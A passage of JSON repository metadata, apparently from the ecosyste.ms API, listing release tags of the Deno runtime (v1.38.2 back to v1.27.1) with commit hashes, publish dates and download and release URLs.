m/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"d